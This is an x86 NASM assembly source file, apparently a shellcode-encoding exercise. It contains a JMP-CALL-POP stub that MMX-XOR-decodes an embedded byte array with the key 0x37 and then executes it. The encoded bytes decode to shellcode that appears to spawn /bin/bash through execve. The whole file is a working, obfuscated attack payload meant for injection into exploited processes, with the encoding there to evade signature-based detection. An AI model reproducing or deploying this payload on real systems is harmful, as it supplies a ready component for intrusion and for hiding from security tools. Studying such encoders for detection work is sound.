; xor_mmx_decode_bash_argv_envp.nasm
; Author: Chase Hatch

section .text
global _start
_start:
	jmp short bytestr
decoder:
	pop edi
	lea esi, [edi + 8]
	xor ecx, ecx
	mov cl, 0xA
	
decode:
	movq mm0, qword [edi]
	movq mm1, qword [esi]
	pxor mm0, mm1
	movq qword [esi], mm0
	add esi, 0x8
	loop decode

	jmp short enc_sc 
	

bytestr:
	call decoder
	dec_bytes:	db 	0x37, 0x37, 0x37, 0x37, 0x37, 0x37, 0x37, 0x37
	enc_sc		db	0x06,0xf7,0x67,0x5f,0x55,0x56,0x44,0x5f,0x5f,0x55,0x5e,0x59,0x18,0x5f,0x18,0x18,0x18,0x18,0xbe,0xd4,0x67,0x5f,0x54,0xa7,0xa7,0xa7,0x5f,0x1a,0x59,0x58,0x45,0xbe,0x73,0x13,0x32,0x67,0x5f,0x5f,0x6a,0x0d,0x6d,0x5f,0x6c,0x55,0x56,0x44,0x5f,0x67,0x64,0x06,0x0a,0xf1,0x73,0x13,0x3c,0x17,0x67,0xba,0x03,0x13,0xba,0x79,0x23,0x66,0x64,0xbe,0xd6,0x67,0xba,0x61,0x33,0x65,0xba,0x23,0x13,0x87,0x3c,0xfa,0xb7
